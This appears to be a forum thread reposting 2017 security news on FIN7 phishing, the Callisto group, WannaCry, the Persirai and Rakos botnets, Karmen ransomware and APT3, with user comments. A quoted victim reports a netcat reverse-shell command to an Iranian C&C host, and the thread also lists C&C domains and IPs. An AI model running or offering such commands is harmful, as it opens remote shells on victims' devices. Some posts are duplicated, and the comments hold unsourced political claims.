“FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7.” reads the analysis published by FireEye. “FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.”

Experts from FireEye distinguish the activity associated with the FIN7 group to the one attributed to CARBANAK.

Security experts discovered a string of fileless malware attacks last month that have been powered by the same hacking framework.

The last attacks attributed to FIN7 recently spotted did not use weaponized Microsoft Office, hackers switched to hidden shortcut files (LNK files) as an attack vector to launch “mshta.exe”. Then FIN7 hackers used the VBScript functionality launched by mshta.exe to compromise the victim’s system.

“In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.” reads the analysis.

Hackers leveraged on spear phishing emails using malicious DOCX or RTF files, each being a different variant of the same LNK file and VBScript technique.

The DOCX and RTF files attempt to convince the user to double-click included images.

“both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document” states the analysis.

FIN7 group campaign

“In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique.”

The ongoing campaign targeted large restaurant chains, hospitality, and financial service organizations, threat actors used phishing messages themed as complaints, catering orders, or resumes. To improve the efficiency of the campaign the FIN7 hackers were also calling the targets to make sure they received the email.

According to the experts, this new phishing scheme is more effective respect previous ones.

“Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object. By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action,” state the researchers.

Hackers used a multilayer obfuscated PowerShell script that once launched executes shellcode for a Cobalt Strike stager. The shellcode downloads an additional payload from a specific C&C server using DNS aaa.stage.14919005.www1.proslr3[.]com, if the reply is successful, the PowerShell executes the embedded Cobalt Strike.

The FIN7 group also used the HALFBAKED backdoor in the ongoing attacks.

FireEye researchers examined shortcut LNK files created by attackers that allowed them to reveal valuable information attackers environment.

One of the LNK files used by hackers in the last campaign revealed some specific information about the attackers, for example, that the hackers likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.

The Hacking Team hack involved a databreach of over 600Gs of data..Tools...source code and emails....all posted on the net gfor Review and use...

The Callisto APT Group borrowed the source code leaked by hackers that broke into Hacking Team network.


According to F-Secure Labs, The Callisto APT Group used the HackingTeam leaked surveillance software to gather intelligence on foreign and security policy in eastern Europe and the South Caucasus.

The Callisto APT group targeted government officials, military personnel, journalists and think tanks since at least 2015.

F-Secure is still investigating the case, the experts of the company reported that the Callisto Group’s infrastructure has links with entities in China, Russia, and Ukraine.The researchers speculate the attacker is a nation state actor:

“It is worth noting that during our investigation we uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances.” reads the report published by F-Secure. “While the targeting would suggest that the main benefactor of the Callisto Group’s activity is a nation state with a specific interest in the Eastern Europe and South Caucasus regions, the link to infrastructure used for the sale of controlled substances hints at the involvement of a criminal element. Finally, the infrastructure associated with the Callisto Group and related infrastructure contain links to at least Russia, Ukraine, and China in both the content hosted on the infrastructure, and in WHOIS information associated with the infrastructure.”

The Callisto APT Group was involved in highly targeted phishing attacks using a malware that is a variant of the Scout tool from the RCS Galileo developed by the surveillance firm HackingTeam.

The code of the surveillance tool was leaked online after hackers broke into the Hacking Team network. F-Secure experts believe the Callisto Group did not utilize the leaked RCS Galileo source code, but rather attackers used the leaked readymade installers to set up their own installation of the RCS Galileo platform.

“The process for using the leaked installers to set up an RCS Galileo installation has been described online in publicly available blogposts, making the process trivial to achieve” continues the report. “In all known malicious attachments, the final payload was a variant of the “Scout” tool from the HackingTeam Remote Control System (RCS) Galileo hacking platform.”

According to the group, the Callisto APT continues to be active, the experts observed the last malware in February 2016, meanwhile, they continue setting up new phishing infrastructure on weekly bases.

Let me suggest reading the report on the Callisto APT Group that is full of interesting info, including IoCs and mitigation strategies.

CRITICAL


PSA: someone is spreading a massive Gmail phishing email right now. DO NOT CLICK on the Google Doc link.
https://motherboard.vice.com/en_us/article/massive-gmail-google-doc-phishing-email#

(Added by Mod) orhttp://www.independent.co.uk/life-style/gadgets-and-tech/google-phishing-emails-attack-gmail-scam-link-doc-invitation-hack-a7716581.html
…

In other infosec news, German bank hackers used SS7 hijacking to steal SMS 2FA tokens and drain accounts [in German]

http://www.sueddeutsche.de/digital/it-sicherheit-schwachstelle-im-mobilfunknetz-kriminelle-hacker-raeumen-konten-leer-1.3486504

European and US telco providers have known about this major issue since 2014 and failed to implement stronger available security features.....and we are now in 2017....

I would be interested to know if this is a coincidence with the Trend Micro report on Friday, or someone making an OAUTH bomb after reading it.

Reference the Google Gmail phishing attack yesterday.....

Shout out to @Google security ppl who got the #OAuthWorm disabled in under an hour and to @Cloudflare for sinkholing. Great response.

Was the attack actually generated after reading the Micro Trend report on the Russian state sponsored French hacking of Marcon using OAuth?

Not clear who's behind the attack, but conspicuously similar MO to a major APT28 campaign last year disclosed by Trend Micro last Friday.

This big phishing attack is clever; an OAUTH based attack. Tricks you into giving "permission" to read your emails a fake Google Docs app.

Password Alert is a free Chrome extension that journalists (or anyone) can use to protect against phishing
https://goo.gl/vrIEkA# #WPDF2017

A good video of the actual attack in progress....

https://twitter.com/zachlatta/status/859843151757955072

Apple has recently fixed an iCloud Keychain vulnerability that could have been exploited by hackers to steal sensitive data from iCloud users.

The flaw allowed hackers to run man-in-the-middle (MitM) attacks to obtain sensitive user information (i.e. names, passwords, credit card data, and Wi-Fi network information).

The researcher Alex Radocea of Longterm Security discovered in March a vulnerability tracked as CVE-2017-2448 that affects the iCloud Keychain

http://securityaffairs.co/wordpress/58931/malware/p2p-transient-rakos-botnet.html

A really great article..well worth reading for those that follow this type of infomation....

The Rakos botnet – Exploring a P2P Transient Botnet From Discovery to Enumeration
May 10, 2017# By#Pierluigi#Paganini


1. Introduction
We recently deployed a high interaction honeypots#expecting it to be compromised by a specific malware. But in the first few days, instead of getting infected by the expected malware, it received a variety of attacks ranging from SSH port forwarding to “Viagra and Cialis” SPAM to XORDDoS failed deployment attempts. By the third day, it was insistently hit and compromised by Rakos, a Linux/Trojan.
Based on the expected Rakos behavior reported last December by ESET [1], our honeypot was recruited to a botnet and immediately began attempting connections to other hosts on the Internet, both to “call home” and to search for new victims. Although it wasn’t our initial plan, we noticed that this sample didn’t behave like the one ESET described, which got us curious and made us analyze it here at Morphus Labs.
After analyzing and exploiting this botnet’s communication channel and employing Crawling and Sensor Injection enumeration methods, we did find a network floating around 8,300 compromised devices per day spread over 178 countries worldwide. Considering the recent DDoS attack reported by Incapsula [2] against a US College, originated from 9,793 bots, which was able to generate 30,000 requests per second during 54 hours, we may infer how potentially threatening is Rakos botnet.
2. Botnet C&C channel analysis
To better understand this P2P Transient botnet behavior and its C&C protocol, we listened to its traffic for 24 hours, and after analyzing it, we noticed two kinds of communications: one between bots through HTTP and, the other, between bots and C&C servers through TLS/SSL. In this section, we detail the commands we mapped.
Some definitions before start:
Checker: An infected machine (“bot”) that is part of the botnet.
Skaro: C&C server
A particular node may play both roles

Continued.....


The other graph shows the real interconnection between nodes, as seen in Figure 6. Here we can see a very thick botnet where#virtually#all Checkers know all Skaros.
Now, plotting the discovery path graph on the world map, as seen in Figure 7, we may have an idea of the botnet worldwide. To geolocalize the nodes, we used MaxMind database [8].

New IOT Attack Linked To Iran – Persirai Malware Strikes at IP Cameras in Latest IOT Attack


Trend Micro has discovered a new attack on internet-based IP cameras and recorders. The new Internet of Things (IOT) attack called ELF_PERSIRAI has also been back-tracked to an Iranian research institute which restricts its use to Iranians only, indicating a possible state sponsored cyber strike by Tehran.
“C&C (Command and Control) servers we discovered were found to be using the .IR country code. This specific country code is managed by an Iranian research institute which restricts it to Iranians only. We also found some special Persian characters which the malware author used,” stated Trend Micro in its discovery release posted online.
IP Camera users have also encounter the malware attack and noted its point of origin appears to be Iran.
“Hello found the following text on my 2 ip cameras (nc load.gtpnet.ir 1234 -e /bin/sh) and wondering who does that domain belong to? All I know is it is an iranian address nothing on whois. Ive obviously been hacked one of these cameras was in the kids room,” stated one user in the Reddit hacking forum.
The attack is based on the previously successful Mirai IOT strike against IP cameras that was used to disrupt the Internet with a giant Denial of Service (DOS) attack in 2016. However, while over 120,000 IP camera systems appear to be infected, over 30% of the Persirai targets are inside China with only small fraction located outside of the PRC; in Italy (3%), the UK (3%) and the USA (8%).
The Persirai attack is disturbing on a number of fronts.# Its base on the open-source Mirai strike shows that the freely available source code will be modified by attackers to strike again in different forms.# Persirai is also very stealthy, leaving most camera owners unaware that their systems are infected.
Yet, the worst feature is that the command and control computers used to run the malicious bot-net are using the country code of IR or Iran.# Infected IP cameras report to command servers at:

load.gtpnet.ir
ntp.gtpnet.ir
185.62.189.232
95.85.38.103

[B]The Persirai attack installs itself and then deletes the installation files to hide its presence on the target camera, running in memory only. It then proceeds to download and install additional control software and blocking software. Once communications are established with the command and control network server, the infected camera is then ordered to search for other cameras and infect them as well.

Persirai blocks other zero-day exploits from gaining access to a targeted IP Camera by pointing ftpupdate.sh and ftpupload.sh to /dev/null, preventing other attacks. This feature may be an effort to prevent duplicate attacks by Persirai as much as to prevent other bot-net attackers from gaining control of the now captured IP Camera. The fact that Persirai is running in memory does mean it is also eliminated once the IP Camera is rebooted but, unless the user takes counter-measures, the targeted system will still be vulnerable to the exploit.

While Trend Micro advises IP Camera users to use strong passwords, the Persirai attack is not dependent on a password attack, nor does it appear to steal passwords.# A better counter-measure is to disable Universal Plug and Play (UPnP) features on your router.# Universal Plug and Play (UPnP) is a network protocol that allows devices such as IP Cameras to open a port on the router and act like a server.# This feature also makes the attached devices highly visible targets for the Persirai malware attack.
Users can also simply remove their IP Camera systems from Internet access altogether and then set up a private VPN service to allow them to log into the cameras by remote.# Users are also advised to update their firmware on their IP Cameras and maintain a close inspection of any web address linked activity.
The Persirai attack is part of a new trend to strike at the Internet via devices not traditionally viewed as computers.# These malware strikes illustrate the issue of vendors selling hardware with little or no security.# There are no current regulations or standards for IOT device security.# Consumers are literally left on their own and frequently choose low cost systems which have no security features such as encryption or even manufacturer updates.
While many IOT users are aware enough to update their computers and cell phones with the latest software and perform anti-virus checks, they are not aware that other devices such as cameras, washing machines, refrigerators and DVR recorders may also require security checks.# Even DVD players and smart TVs from major manufacturers are vulnerable to exploits as illustrated by the Wikileaks release of the WEEPING ANGEL attacks developed by the CIA in co-operation with the UK’s GCHQ spy agency which attacked Samsung TVs.
Details from Trend Micro on Persirai:
http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/

A Security researcher discovered that a Conexant audio driver shipped with dozens HP laptops and tablet PCs logs keystrokes.


Security researcher Thorsten Schroeder of security firm Modzero discovered that a Conexant audio driver shipped with many HP laptops and tablet PCs logs keystrokes. The expert discovered that#MicTray64.exe application, which is installed with the Conexant audio driver package,is registered as a scheduled task in Windows systems and is able to monitor keystrokes to determine if the user has pressed any audio-related keys (e.g. mute/unmute).

The keystrokes are logged to a file in the Users/Public folder Furthermore and are passed on to the OutputDebugString debugging API, allowing a process to access the data via the MapViewOfFile function.

Unfortunately, this feature can be abused to steal user data such as login credentials, a malware could access keystrokes without triggering security solutions monitoring for suspicious activities.

The researcher observed that an earlier version of the MicTray64 app released in December 2015 did not log keystrokes to a file, the dangerous feature was implemented starting from the version 1.0.0.46 released in October 2016.

“Actually, the purpose of the software is to recognize whether a special key has been pressed or released. Instead, however, the developer has introduced a number of diagnostic and debugging features to ensure that all keystrokes are either broadcasted through a debugging interface or written to a log file in a public directory on the hard-drive. This type of debugging turns the audio driver effectively into a keylogging spyware. On the basis of meta-information of the files, this keylogger has already existed on HP computers since at least Christmas 2015.”#Schroeder wrote in a blog post.

“There is no evidence that this keylogger has been intentionally implemented. Obviously, it is a negligence of the developers – which makes the software no less harmful,”

The flaw, tracked as CVE-2017-8360, affects 28 HP laptops and tablet PCs, including EliteBook, Elite X2, ProBook, and ZBook models. The experts at Modzero speculate other devices manufactured by other vendors that use Conexant hardware and drivers could be affected.
Users are invited to delete the MicTray64from \Windows\System32 and the MicTray.log log file from \Users\Public.

HP plans to fix the issue as soon as possible.

I find the NYTs op ed leading line "MicroSoft should have done more for computer users other than for their legally registered customers".

This is interesting for a number of reasons....software producers have for years complained about copyright violations, black copies...etc..and it does in the end drive up the overall cost of their products as they factor that into their own product pricing..to make up for the loss of a sale.

On the other hand do software prices have to be high as the actually cost of manufacturing millions of CDs these days is virtually nothing in the actual sales price....they argue that must continually evolve the product, support the product and sell the product all costs of doing business...

So should a software manufacturer be responsible for the protection of unlicensed end users who have paid nothing for the product??

Or say in the case of Russia the hardest hit...an entire nation state running on illegally copied and or stolen software?? AND then MS is suppose to shallow those costs???

The latest NCSC (UK) guidance on Ransomware

The NCSC are aware of a ransomware campaign relating to version 2 of the “WannaCry” malware affecting a wide range of organisations globally.# NCSC are working with affected organisations and partners to investigate and coordinate the response in the UK.

From investigations and analysis performed to date, we know that the malware encrypts files, provides the user with a prompt which includes; a ransom demand, a countdown timer and bitcoin wallet to pay the ransom into.

The malware uses the vulnerability MS17-010 to propagate through a network using the SMBv1 protocol. This enables the malware to infect additional devices connected to the same network.

The NCSC advise the following steps be performed in order to contain the propagation of this malware:
Deploy patch MS17-010:
https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

A new patch has been made available for legacy platforms, and is available here:
https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks

If it is not possible to apply this patch, disable SMBv1.#There is guidance here:
https://support.microsoft.com/en-us/help/2696547

and/or block SMBv1 ports on network devices [UDP 137, 138#and TCP 139, 445]
If these steps are not possible, propagation can be prevented by shutting down vulnerable systems.

Work done in the security research community has prevented a number of potential compromises. To benefit from this, a system must be able to resolve and connect to the domain below at the point of compromise.
www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

Unlike most malware infections, your IT department should not block this domain.

Anti-virus vendors are increasingly becoming#able to detect and remediate this malware, therefore updating antivirus products will provide additional protection (though this will not recover any data that has already been encrypted).

The NCSC have previously published broader guidance on protecting your organisation from ransomware.

Hackers are selling fake diplomas and certifications in the dark web
According to Israeli threat intelligence firm Sixgill, certifications and fake diplomas are very cheap and easy to buy in the dark web. It is quite easy to buy in dark#web marketplaces#any kind of illegal product and service, including#fake#certifications...

Karmen Ransomware, a cheap RaaS service that implements anti-analysis features

Security experts from threat intelligence firm#Recorded Future have spotted a new ransomware as a service (RaaS) called Karmen. The service allows customers to easy create their ransomware campaign in a few steps and without specific skills.
Wannabe-crooks also track infected systems via a “Clients” tab, the Dashboard implements an efficient and easy to use cockpit that include various information such as the number of infected machines, earned revenue, and available updates for the malware.
The Karmen RaaS is very cheap, it costs just $175, buyers can decide the ransom#prices and the duration of the period in which the victims can pay the ransom.
The Karmen ransomware is based on the open-source ransomware Hidden Tear, which was released in August 2015 by the#Turkish security researchers Utku Sen for educational purposes.
The first Karmen infections#were reported in December 2016, the malware infected machines in Germany and the United States.
The Karmen ransomware is a multi-threaded and multi-language ransomware that supports .NET 4.0 and uses the AES-256 encryption standard.
The malware is .NET dependent and requires PHP 5.6 and MySQL.
“On March 4, 2017, a member of a top-tier cyber criminal community with the username “Dereck1” mentioned a new ransomware variant called “Karmen.” reported a blog post published by Recorded Future.
“Further investigation revealed that “DevBitox,” a Russian-speaking cyber criminal, was the seller behind the Karmen malware on underground forums in March 2017.”
“However, the first cases of infections with Karmen were reported as early as December 2016 by victims in Germany and the United States.”
Once infected a machine, the ransomware displays a ransom note with payment instructions, unlike similar malware, the Karmen ransomware#automatically deletes the decryptor when detecting a sandbox environment or any other analysis software.
“A notable feature of Karmen is that it automatically deletes its own decryptor if a sandbox environment or analysis software is detected on the victim’s computer.” continues the blog post.
Below the list of ransomware features#provided by DevBitox:
Multi-threaded
Multi-language
Supports .NET 4.0 and newer versions
Encryption algorithm: AES-256
Adaptive admin panel
Encrypts all discs and files
Separate BTC wallet for each victim
Small size
Automatic deletion of loader
Automatic deletion of malware (after payment was received)
Minimal connection with control server
Robust control panel
Almost FUD (1/35)
Automatic file decryption after received payment
T2W compatible
File extensions remain the same
Detection of anti-debugger/analyzers/VM/sandbox
Automatic deletion of decryptor if sandbox environment is detected on victim’s computer*
Light version: obfuscation and autoloader only
Full version: detection of analyzing software
The#ransomware is available for sale in both light and full versions, the light version doesn’t include anti-analysis features.

Global ‘Wana’ Ransomware Outbreak Earned Perpetrators $26,000 So Far

Wcry ransomware is reborn without its killswitch, starts spreading anew



Yesterday, the world got a temporary respite from the virulent Wcry ransomware worm, which used a leaked NSA cyberweapon to spread itself to computers all over the world, shutting down hospitals, financial institutions, power companies, business, and private individuals' computers, demanding $300 to reactivate them.

The respite was thanks to a sloppy bit of programming from the worm's creator, who'd left a killswitch in the code: newly infected systems checked to see if a certain domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com) existed before attempting to spread the infection; by registering this domain, security researchers were able to freeze the worm.

But a day later, it's back, and this time, without the killswitch. Security researchers running honeypots have seen new infections by versions of the worm that can spread even when the iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com domain is live.

"I can confirm we've had versions without the kill switch domain connect since yesterday," Costin Raiu, director of global research and analysis team at Kaspersky Lab told Motherboard on Saturday.

Microsoft officially confirms @NSAGov developed the flaw that brought down hospitals this weekend.
https://blogs.microsoft.com/on-the-issues/2017/05/14/need-urgent-collective-action-keep-people-safe-online-lessons-last-weeks-cyberattack/#

Troy Hunt: Everything you need to know about the WannaCry / Wcry / WannaCrypt ransomware
https://www.troyhunt.com/everything-you-need-to-know-about-the-wannacrypt-ransomware/#

Ransomware hits small number of U.S. critical infrastructure operators: official
http://reut.rs/2pNAgIR

Patriarch of Russian Orthodox church making sure that the Ministry of Internal Affairs computers won't get affected by WannaCry virus attack

The National Cyber Security Centre, the NCSC (UK and part of GCHQ), has published technical guidance, which includes specific software patches to use that will prevent uninfected computers on your network from becoming infected with the “WannaCry” Ransomware:https://www.ncsc.gov.uk/guidance/ransomware-latest-ncsc-guidance

For additional in-depth technical guidance on how to protect your organisation from ransomware, details can be found here:https://www.ncsc.gov.uk/guidance/protecting-your-organisation-ransomware

The Soufan Group's commentary:http://www.soufangroup.com/tsg-intelbrief-the-global-ransomware-attack/

Massive cryptocurrency botnet used leaked NSA exploits weeks before WCry
https://arstechnica.com/?post_type=post&p=1098281#

The three bitcoin wallets tied to #WannaCry ransomware have received 216 payments totaling 34.6200695 BTC ($58,821.36 USD).

@DAlperovitch on lessons learned from the #WannaCry cyberattacks:
http://www.atlanticcouncil.org/blogs/new-atlanticist/a-simple-security-update-can-save-your-data#

Hackers mint crypto-currency with technique in global 'ransomware' attack
http://reut.rs/2pTagMh
#

The Electronic signature technology provider DocuSign suffered a data breach
Hackers broke into the system of the technology provider DocuSign and accessed customers email. The experts warn of possible spear phishing attacks. The#Electronic signature technology provider DocuSign suffered a data breach, hackers have stolen emails.


Shadow Brokers are back after WannaCry case, it plans to offer data dump on monthly subscription model

Shadow Brokers made the headlines once again, the notorious group plans to offer data dump on a monthly subscription model. The notorious Shadow Brokers hacking group made the headlines during the weekend#when systems worldwide were compromised by the WannaCry#ransomware..which they had released as part of their NSA data dump.....

Some machines can’t be infected by WannaCry because they have been already infected by Adylkuzz

Security experts at ProofPoint security discovered that many machines can't be infected by WannaCry because they have been already infected by Adylkuzz.

APT32, a new APT group alleged linked to the Vietnamese Government is targeting foreign corporations

APT32 is a new APT group discovered by security experts at FireEye that#is targeting#Vietnamese interests around the globe. The APT32 group, also known as OceanLotus Group, has been active since at least 2013, according to the experts it is a#state-sponsored hacking and cybercrime group........

WikiLeaks Reveals two distinct malware platforms codenamed AfterMidnight and Assassin used by the CIA operators to target Windows systems.

While critical infrastructure worldwide and private organizations were ridiculed by the#WannaCry attack,#WikiLeaks released a new batch of CIA documents from the#Vault 7 leaks.

The new dump included the documentation related to#two CIA frameworks used to create custom malware for Microsoft Windows platform.
The two frameworks are codenamed#AfterMidnight#and#Assassin, both malware implements classic backdoor features that allowed the CIA to take control over the targeted systems.

EU fines Facebook 110 million euros over misleading WhatsApp data
http://reut.rs/2pWdMWj
#

When ransomware guys provide better customer support than most companies #WannaCry

French security researchers say they have found a method to decrypt Windows files locked by WannaCry ransomware.

UIWIX, the Fileless Ransomware that leverages NSA EternalBlue Exploit to spread

experts discovered a new ransomware family, dubbed UIWIX, that uses the NSA-linked EternalBlue exploit for distribution The effects of the militarization of the cyberspace are dangerous and unpredictable. A malicious code developed by a government...


WikiLeaks revealed CIA Athena Spyware, the malware that targets all Windows versions

Wikileaks released the documentation for the Athena Spyware, a malware that could infect and remote control almost any Windows machine. Last Friday, Wikileaks released#the#documentation for AfterMidnight and Assassin malware platforms

HTTPs Phishing sites are increasing, it is the reaction to browser improvements

The number HTTPs Phishing sites continues to increase, it is the response of phishers to the improvements implemented by Browser-makers. If you believe that the HTTPs could protect you from phishing attacks you are wrong, in 2014#TrendMicro warned of the increase#in this ability.....

CISCO start assessing its products against the WannaCry Vulnerability

The tech giant Cisco announced an investigating on the potential impact of WannaCry malware on its products. Recent massive WannaCry#ransomware attack highlighted the importance of patch management for any organization and Internet users.

Microsoft Patch Tuesday updates for May 2017 fix Zero Days exploited by Russian APT groups

Microsoft Patch Tuesday for May 2017 address tens security vulnerabilities, including a number of zero-day flaws exploited by Russian APT groups. Microsoft Patch Tuesday updates for May 2017 fix more than 50 security flaws, including a number of zero-day...

Exclusive: North Korea's Unit 180, the cyber warfare cell that worries the West
http://www.reuters.com/article/us-cyber-northkorea-exclusive-idUSKCN18H020#

Buckle-up for another cyber ride
https://www.wired.com/2017/03/wikileaks-cia-hacks-dump/#

Another datadump of CIA hacked tools...by the Russian intel org Wikileaks...

Security experts at threat intelligence firm Record Future have found a clear link between APT3 cyber threat group and China’s Ministry of State Security.


The curtain has been pulled back a little on the Chinese Intelligence Agency intelligence gathering structure — and it includes private security contractors and the network vendor supply chain.

In 2010, security vendor FireEye identified the Pirpi Remote Access Trojan (RAT) which exploited a then 0-day vulnerability in Internet Explorer versions 6, 7 and 8. FireEye named the threat group APT3 which has also been described as TG-0100, Buckeye, Gothic Panda, and UPS and described them as “one of the most sophisticated threat groups” being tracked at the time.

Since then, APT3 has been actively penetrating corporations and governments in the US, UK and most recently Hong Kong — and everyone has been trying to figure out who they are. APT3 functions very differently than 3LA, the former Chinese military hacking organization leading to the assumption that APT3 is not part of the military complex. At least not officially.

On May 9th, 2017, an unknown party using the alias ‘intrusiontruth’ published a series of blogs posts describing connections between the Pirpi RAT command and control components and shareholders of the Chinese security contractor Guangzhou Boyu Information Technology Company, aka Boyusec.

“On May 9, a mysterious group calling itself “intrusiontruth” identified a contractor for the Chinese Ministry of State Security (MSS) as the group behind the APT3 cyber intrusions.” states the analysis published by Recorder Future.

The names of two specific shareholders of Boyusec appear in the domain registration for the Pirpi C&C servers.##This is particularly interesting because Boyusec supports the Chinese Ministry of State Security (MSS) by collecting civilian human intelligence. Think of them as an outsourcer for a government agency like the United States’ National Security Agency (NSA).

Also interesting is that in 2016 a Pentagon report described the relationship between Boyusec and network equipment manufacturer, Huawei. According to the report, the two companies were colluding to develop security equipment with embedded backdoors which would likely be used by Boyusec to compromise Huawei customers.

“In November 2016, the Washington Free Beacon reported that a Pentagon internal intelligence report had exposed a product that Boyusec and Huawei were jointly producing.” continues the analysis.”According to the Pentagon’s report, the two companies were working together to produce security products, likely containing a backdoor, that would allow Chinese intelligence “to capture data and control computer and telecommunications equipment.” The article quotes government officials and analysts stating that Boyusec and the MSS are “closely connected,” and that Boyusec appears to be a cover company for the MSS.”

To protect our networks, it is important to assess the threats. An important part of threat assessment is to anticipate the motivation of the attackers. APT3 has demonstrated above average skills and has been active for a long time. Add ties to the network vendor supply chain and you have the makings of a dangerous adversary. As part of the Chinese MSS structure you can start to guess at motivation. With this new information, it is a good time to reassess your threat model.

Europol supported the Slovak NAKA crime unit in an operation that resulted in the seizure of the Bloomsfield darknet marketplace.

Another success of the European#police, last week#Europol supported the Slovak NAKA crime unit in the arrest of a Slovak national believed to operate the Bloomsfield#darknet marketplace dealing in drugs and arms.

“Bloomsfield started its marketplace around two years ago, but remained throughout its shelf life a rather small market with few listings and users.” reported website darkweb.world.

The police took into custody the suspect and several of his premises have been searched.

“Europol has supported the Slovak authorities in their investigation into a Slovak national who had been trading firearms, ammunition, and drugs on the Darknet.” reads the statement published by the Europol.

“In one of the locations searched, Slovak authorities discovered and seized five firearms and approximately 600 rounds of ammunition of different calibers. The investigators also found a sophisticated indoor cannabis plantation, 58 cannabis plants and a Bitcoin wallet containing bitcoins worth EUR 203 000, which is thought to have been obtained from illegal online activities.”

The law enforcement has seized the server running the darknet marketplace, experts are analyzing it searching for evidence and other information useful for the investigation.

“The server used by the suspect to host the Darknet marketplace was also seized during the raids and is currently being forensically analysed. Slovak authorities and Europol have extended the investigation into the users and vendors who utilised the marketplace.” states Europol

Bloomsfield was launched around two years ago but is considered a very small market with few listings and users.#It started as the vendor shop of the vendor ‘Biocanna‘ and later other vendors have#joined the darknet market.
Biocanna has shared a portion of a conversation on Twitter concerning the ‘owner of the failing Bloomsfield market.’

Best I've ever seen pic.twitter.com/yKxkNvQ43G
— C (@2ctfm) May 4, 2017

It the above#claims are correct the Europol will have no difficulties to track the other operators of the black market.

“Europol supported Slovakia throughout the entire investigation by providing its analytical and financial intelligence capabilities.” reads the Europol’s announcement. “Also, across-check performed during the house searches generated a hit on Europol’s databases which helped investigators identify a

Darknet vendor living in another EU country. The individual was suspected of supplying one of the firearms found during the house searches in Bratislava.”
Darknet marker places are important facilitators of criminal activities, the monitoring of this ecosystem is crucial for law enforcement.

The Stegano exploit kit, also known as Astrum, continues to evolve, recently its authors adopted the Diffie-Hellman algorithm to hinder analysis.

The Stegano exploit kit made was associated in the past with a massive AdGholas malvertising campaign that delivered malware, mostly Gozi and RAMNIT trojans. Experts at TrendMicro also observed the exploit kit in the Seamless malvertising campaign.

“Astrum’s recent activities feature several upgrades and show how it’s starting to move away from the more established malware mentioned above.
It appears these changes were done to lay the groundwork for future campaigns, and possibly to broaden its use.

With a modus operandi that deters analysis and forensics by#abusing the Diffie-Hellman key exchange, it appears Astrum is throwing down the gauntlet.” reads the analysis published by Trend Micro.

In March, the French research Kafeine#reported the Stegano EK exploiting the information disclosure vulnerability tracked as CVE-2017-0022. Hackers exploited the#flaw#to evade antivirus detection and analysis.

A month later, the Stegano exploit kit was updated to#prevent security researchers from replaying the malicious network traffic.

“We found that this anti-replay feature was designed to abuse the Diffie-Hellman key exchange—a widely used algorithm for encrypting and securing network protocols. Angler was first observed doing this back in 2015.” continues the analysis.

“Implementing the Diffie-Hellman key exchange prevents malware analysts and security researchers from getting a hold of the secret key Astrum uses to encrypt and decrypt their payloads. Consequently, obtaining the original payload by solely capturing its network traffic can be very difficult.”

According to the experts, the#Astrum/#Stegano exploit kit includes exploit codes for a number of vulnerabilities in Adobe Flash, including the CVE-2015-8651#RCE, the#CVE-2016-1019 RCE, and the out-of-bound read bug flaw tracked as#CVE-2016-4117.

Experts highlighted that#currently the Stegano#Exploit Kit isn’t used to deliver malware and associated traffic is very low, both circumstances suggest we can soon observe a spike in its activity.

“It wouldn’t be a surprise if [Astrum/Stegano’s] operators turn it into an exclusive tool of the trade—like Magnitude and Neutrino did—or go beyond leveraging security flaws in Adobe Flash. Emulating capabilities from its predecessors such as fileless infections that can fingerprint its targets and deliver encrypted payloads shouldn’t be far off,” concluded Trend Micro.

Hacking #IoT Devices: The Alarming Internet of Things #CyberSecurity MT @ipfconline1

http://www.reuters.com/article/us-russia-cyber-banks-idUSKBN18I0VE?feedType=RSS&feedName=topNews&utm_source=twitter&utm_medium=Social

Technology News | Mon May 22, 2017 | 5:00am EDT

Exclusive: Hackers hit Russian bank customers, planned international cyber raids



Russian cyber criminals used malware planted on Android mobile devices to steal from domestic bank customers and were planning to target European lenders before their arrest, investigators and sources with knowledge of the case told Reuters.
Their campaign raised a relatively small sum by cyber-crime standards - more than 50 million roubles ($892,000) - but they had also obtained more sophisticated malicious software for a modest monthly fee to go after the clients of banks in France and possibly a range of other western nations.

"Cron's success was due to two main factors," Volkov said. "First, the large-scale use of partner programs to distribute the malware in different ways. Second, the automation of many (mobile) functions which allowed them to carry out the thefts without direct involvement."

Patriarch of Russian Orthodox church making sure that the Ministry of Internal Affairs computers won't get affected by WannaCry virus attack

Russia suffered the highest number of registered WannaCry attacks globally and now suddenly they did not.....

Deputy secretary for Russia's National Security Council says WannaCry ransomware caused minimal damage in Russia.

That is not the story carried by their state media in the first days of the attack....

Over 100K computers got hit....as Russian runs largely illegal MS XP copies ......and illegal copies of MS Server 2003....

Russia suffered the highest number of registered WannaCry attacks globally and now suddenly they did not.....

Deputy secretary for Russia's National Security Council says WannaCry ransomware caused minimal damage in Russia.

That is not the story carried by their state media in the first days of the attack....

Over 100K computers got hit....as Russian runs largely illegal MS XP copies ......and illegal copies of MS Server 2003....

Average Russian OS's are XP and MS Server 03?

That's crazy.

I think I also read that Russian banks only invest a fraction of that spent by major US/Western banks on IT/Cyber security.

Is the Russian banking sector seriously vulnerable to a non attributable proxy attack campaign?

Average Russian OS's are XP and MS Server 03?

That's crazy.

I think I also read that Russian banks only invest a fraction of that spent by major US/Western banks on IT/Cyber security.

Is the Russian banking sector seriously vulnerable to a non attributable proxy attack campaign?

Answer to the question is...yes they are example..Morgan Stanley invested over 600M USDs in IT security in 2016 for their global network........

